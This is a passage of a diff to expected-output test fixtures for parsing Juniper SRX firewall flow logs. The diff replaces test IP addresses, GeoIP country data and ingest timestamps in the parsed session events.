rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:15:58.025458200Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"33040\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.14\" nat-source-port=\"33040\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "action": "flow_started", "category": [ @@ -2227,7 +2030,7 @@ "port": 80, "bytes": 646, "packets": 3, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2235,24 +2038,24 @@ "destination": { "nat": { "port": 80, - "ip": "5.0.0.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 646, - "packets": 3, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 3 }, "rule": { "name": "permit-all" @@ -2260,26 +2063,23 @@ "source": { "nat": { "port": 48873, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 48873, "bytes": 392, - "ip": "216.160.83.57", + "ip": "67.43.156.14", "user": { "name": "user1" }, @@ -2329,9 +2129,8 @@ "user1" ], "ip": [ - "216.160.83.57", - "175.16.199.1", - "5.0.0.1" + "67.43.156.14", + "67.43.156.15" ] }, "client": { @@ -2341,13 +2140,13 @@ "port": 48873, "bytes": 392, "packets": 5, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715468995Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"TCP CLIENT RST\" source-address=\"216.160.83.57\" source-port=\"48873\" destination-address=\"175.16.199.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"175.16.199.1\" nat-source-port=\"48873\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:15:58.025465Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP CLIENT RST\" source-address=\"67.43.156.14\" source-port=\"48873\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"48873\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2013-01-19T15:18:20.040Z", "action": "flow_close", @@ -2369,7 +2168,7 @@ "port": 768 }, "port": 768, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -2377,22 +2176,22 @@ "destination": { "nat": { "port": 768, - "ip": "30.0.0.100" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 768, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "rule": { "name": "alg-policy" @@ -2400,25 +2199,22 @@ "source": { "nat": { "port": 24065, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 24065, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -2455,9 +2251,7 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "30.0.0.100" + "67.43.156.14" ] }, "client": { @@ -2465,12 +2259,12 @@ "port": 24065 }, "port": 24065, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715472612Z", - "original": "\u003c14\u003e1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@2636.1.1.1.2.35 source-address=\"216.160.83.57\" source-port=\"24065\" destination-address=\"175.16.199.1\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"24065\" nat-destination-address=\"30.0.0.100\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:15:58.025469300Z", + "original": "\u003c14\u003e1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"24065\" destination-address=\"67.43.156.14\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"24065\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", "kind": "event", "action": "flow_started", "category": [ @@ -2487,7 +2281,7 @@ { "server": { "port": 161, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "informational" @@ -2495,40 +2289,25 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 161, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "rule": { "name": "MgmtAccess-trust-cleanup" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 37233, - "ip": "216.160.83.57" + "ip": "10.0.0.26" }, "juniper": { "srx": { @@ -2568,18 +2347,18 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "10.0.0.26", + "67.43.156.13" ] }, "client": { "port": 37233, - "ip": "216.160.83.57" + "ip": "10.0.0.26" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715476670Z", - "original": "\u003c14\u003e1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@2636.1.1.1.2.134 source-address=\"216.160.83.57\" source-port=\"37233\" destination-address=\"175.16.199.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025474Z", + "original": "\u003c14\u003e1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@67.43.156.15 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"67.43.156.13\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_deny", @@ -2601,7 +2380,7 @@ "port": 80, "bytes": 646, "packets": 3, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2609,24 +2388,24 @@ "destination": { "nat": { "port": 80, - "ip": "5.0.0.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 646, - "packets": 3, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 3 }, "rule": { "name": "permit-all" @@ -2634,26 +2413,23 @@ "source": { "nat": { "port": 48873, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 48873, "bytes": 392, - "ip": "216.160.83.57", + "ip": "67.43.156.14", "user": { "name": "user1" }, @@ -2703,9 +2479,8 @@ "user1" ], "ip": [ - "216.160.83.57", - "175.16.199.1", - "5.0.0.1" + "67.43.156.14", + "67.43.156.15" ] }, "client": { @@ -2715,13 +2490,13 @@ "port": 48873, "bytes": 392, "packets": 5, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715480186Z", - "original": "\u003c14\u003e1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@2636.1.1.1.2.129 reason=\"TCP CLIENT RST\" source-address=\"216.160.83.57\" source-port=\"48873\" destination-address=\"175.16.199.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"175.16.199.1\" nat-source-port=\"48873\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:15:58.025477900Z", + "original": "\u003c14\u003e1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@67.43.156.15 reason=\"TCP CLIENT RST\" source-address=\"67.43.156.14\" source-port=\"48873\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"48873\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2020-01-19T15:18:20.040Z", "action": "flow_close", @@ -2745,7 +2520,7 @@ "port": 80, "bytes": 2132, "packets": 34, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -2753,24 +2528,24 @@ "destination": { "nat": { "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 2132, - "packets": 34, - "ip": "175.16.199.1" + "ip": "67.43.156.14", + "packets": 34 }, "rule": { "name": "default-permit" @@ -2778,27 +2553,12 @@ "source": { "nat": { "port": 6018, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "172.19.34.100" }, "port": 58943, "bytes": 2322, - "ip": "216.160.83.57", - "packets": 42 + "packets": 42, + "ip": "10.1.1.100" }, "juniper": { "srx": { @@ -2839,8 +2599,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "10.1.1.100", + "67.43.156.14", + "172.19.34.100" ] }, "client": { @@ -2850,13 +2611,13 @@ "port": 58943, "bytes": 2322, "packets": 42, - "ip": "216.160.83.57" + "ip": "10.1.1.100" }, "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715483603Z", - "original": "\u003c14\u003e1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address=\"216.160.83.57\" source-port=\"58943\" destination-address=\"175.16.199.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"175.16.199.1\" nat-source-port=\"6018\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"80\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"16118\" packets-from-client=\"42\" bytes-from-client=\"2322\" packets-from-server=\"34\" bytes-from-server=\"2132\" elapsed-time=\"60\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" destination-interface-name=\"ge-0/0/0.0\" category=\"N/A\" sub-category=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025483700Z", + "original": "\u003c14\u003e1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"10.1.1.100\" source-port=\"58943\" destination-address=\"67.43.156.14\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"6018\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"80\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"16118\" packets-from-client=\"42\" bytes-from-client=\"2322\" packets-from-server=\"34\" bytes-from-server=\"2132\" elapsed-time=\"60\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" destination-interface-name=\"ge-0/0/0.0\" category=\"N/A\" sub-category=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "kind": "event", "start": "2020-07-14T14:17:11.928Z", "action": "flow_started", @@ -2880,7 +2641,7 @@ "port": 8883, "bytes": 9670, "packets": 96, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2888,24 +2649,24 @@ "destination": { "nat": { "port": 8883, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 8883, "bytes": 9670, - "packets": 96, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 96 }, "rule": { "name": "default-permit" @@ -2913,27 +2674,12 @@ "source": { "nat": { "port": 24519, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "172.19.34.100" }, "port": 64720, "bytes": 9530, - "ip": "216.160.83.57", - "packets": 161 + "packets": 161, + "ip": "10.1.1.100" }, "juniper": { "srx": { @@ -2983,8 +2729,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "10.1.1.100", + "67.43.156.15", + "172.19.34.100" ] }, "client": { @@ -2994,13 +2741,13 @@ "port": 64720, "bytes": 9530, "packets": 161, - "ip": "216.160.83.57" + "ip": "10.1.1.100" }, "event": { "duration": 23755000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715487209Z", - "original": "\u003c14\u003e1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"idle Timeout\" source-address=\"216.160.83.57\" source-port=\"64720\" destination-address=\"175.16.199.1\" destination-port=\"8883\" connection-tag=\"0\" service-name=\"None\" nat-source-address=\"175.16.199.1\" nat-source-port=\"24519\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"8883\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"3851\" packets-from-client=\"161\" bytes-from-client=\"9530\" packets-from-server=\"96\" bytes-from-server=\"9670\" elapsed-time=\"23755\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" secure-web-proxy-session-type=\"NA\" peer-session-id=\"0\" peer-source-address=\"0.0.0.0\" peer-source-port=\"0\" peer-destination-address=\"0.0.0.0\" peer-destination-port=\"0\" hostname=\"NA NA\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025488600Z", + "original": "\u003c14\u003e1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"10.1.1.100\" source-port=\"64720\" destination-address=\"67.43.156.15\" destination-port=\"8883\" connection-tag=\"0\" service-name=\"None\" nat-source-address=\"172.19.34.100\" nat-source-port=\"24519\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"8883\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"3851\" packets-from-client=\"161\" bytes-from-client=\"9530\" packets-from-server=\"96\" bytes-from-server=\"9670\" elapsed-time=\"23755\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" secure-web-proxy-session-type=\"NA\" peer-session-id=\"0\" peer-source-address=\"0.0.0.0\" peer-source-port=\"0\" peer-destination-address=\"0.0.0.0\" peer-destination-port=\"0\" hostname=\"NA NA\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "risk_score": 1.0, "kind": "event", "start": "2020-07-13T16:43:05.041Z", @@ -3023,7 +2770,7 @@ "port": 53 }, "port": 53, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -3031,22 +2778,22 @@ "destination": { "nat": { "port": 53, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 53, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "rule": { "name": "default-permit" @@ -3054,25 +2801,10 @@ "source": { "nat": { "port": 30838, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "172.19.34.100" }, "port": 49583, - "ip": "216.160.83.57" + "ip": "10.1.1.100" }, "juniper": { "srx": { @@ -3113,8 +2845,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "10.1.1.100", + "67.43.156.15", + "172.19.34.100" ] }, "client": { @@ -3122,12 +2855,12 @@ "port": 30838 }, "port": 49583, - "ip": "216.160.83.57" + "ip": "10.1.1.100" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715491618Z", - "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.129 source-address=\"216.160.83.57\" source-port=\"49583\" destination-address=\"175.16.199.1\" destination-port=\"53\" connection-tag=\"0\" service-name=\"junos-dns-udp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"30838\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"53\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15399\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025492900Z", + "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"10.1.1.100\" source-port=\"49583\" destination-address=\"67.43.156.15\" destination-port=\"53\" connection-tag=\"0\" service-name=\"junos-dns-udp\" nat-source-address=\"172.19.34.100\" nat-source-port=\"30838\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15399\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_started", @@ -3150,7 +2883,7 @@ "port": 53, "bytes": 82, "packets": 1, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -3158,24 +2891,24 @@ "destination": { "nat": { "port": 53, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 53, "bytes": 82, - "packets": 1, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 1 }, "rule": { "name": "default-permit" @@ -3183,27 +2916,12 @@ "source": { "nat": { "port": 26764, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "172.19.34.100" }, "port": 63381, "bytes": 66, - "ip": "216.160.83.57", - "packets": 1 + "packets": 1, + "ip": "10.1.1.100" }, "juniper": { "srx": { @@ -3248,8 +2966,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "10.1.1.100", + "67.43.156.15", + "172.19.34.100" ] }, "client": { @@ -3259,13 +2978,13 @@ "port": 63381, "bytes": 66, "packets": 1, - "ip": "216.160.83.57" + "ip": "10.1.1.100" }, "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715495475Z", - "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"Closed by junos-alg\" source-address=\"216.160.83.57\" source-port=\"63381\" destination-address=\"175.16.199.1\" destination-port=\"53\" service-name=\"junos-dns-udp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"175.16.199.1\" nat-source-port=\"26764\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"53\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15361\" packets-from-client=\"1\" bytes-from-client=\"66\" packets-from-server=\"1\" bytes-from-server=\"82\" elapsed-time=\"3\" username=\"N/A\" 